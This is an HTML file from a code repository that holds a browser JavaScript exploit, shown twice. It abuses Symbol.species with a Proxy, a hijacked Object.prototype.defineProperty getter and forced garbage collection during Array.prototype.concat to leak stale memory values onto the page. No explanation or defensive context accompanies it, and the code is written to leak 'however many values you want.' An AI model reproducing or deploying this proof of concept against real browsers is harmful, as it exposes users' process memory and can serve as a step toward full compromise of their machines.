lprashant-94/a.html

## a.html
<html>
<script>
var p = new Proxy([], {});
var b_dp = Object.prototype.defineProperty;

class MyArray extends Array {
    static get [Symbol.species]() { return function() { return p; }}; // custom constructor which returns a proxy object
}

var w = new MyArray(100);
w[1] = 0.1;
w[2] = 0.1;

function gc() {
    for (var i = 0; i < 0x100000; ++i) {
        var a = new String();
    }
}

function evil_callback() {
    w.length = 1; // shorten the array so the backstore pointer is relocated
    gc();         // force gc to move the array's elements backstore
    return b_dp;
}

Object.prototype.__defineGetter__("defineProperty", evil_callback);

var c = Array.prototype.concat.call(w);

for (var i = 0; i < 20; i++) { // however many values you want to leak
    document.write(c[i]);
    document.write("<br />");
}
</script>
</html>
	<html>
	<script>
	var p = new Proxy([], {});
	var b_dp = Object.prototype.defineProperty;

	class MyArray extends Array {
	static get [Symbol.species]() { return function() { return p; }}; // custom constructor which returns a proxy object
	}

	var w = new MyArray(100);
	w[1] = 0.1;
	w[2] = 0.1;

	function gc() {
	for (var i = 0; i < 0x100000; ++i) {
	var a = new String();
	}
	}

	function evil_callback() {
	w.length = 1; // shorten the array so the backstore pointer is relocated
	gc(); // force gc to move the array's elements backstore
	return b_dp;
	}

	Object.prototype.__defineGetter__("defineProperty", evil_callback);

	var c = Array.prototype.concat.call(w);

	for (var i = 0; i < 20; i++) { // however many values you want to leak
	document.write(c[i]);
	document.write("<br />");
	}
	</script>
	</html>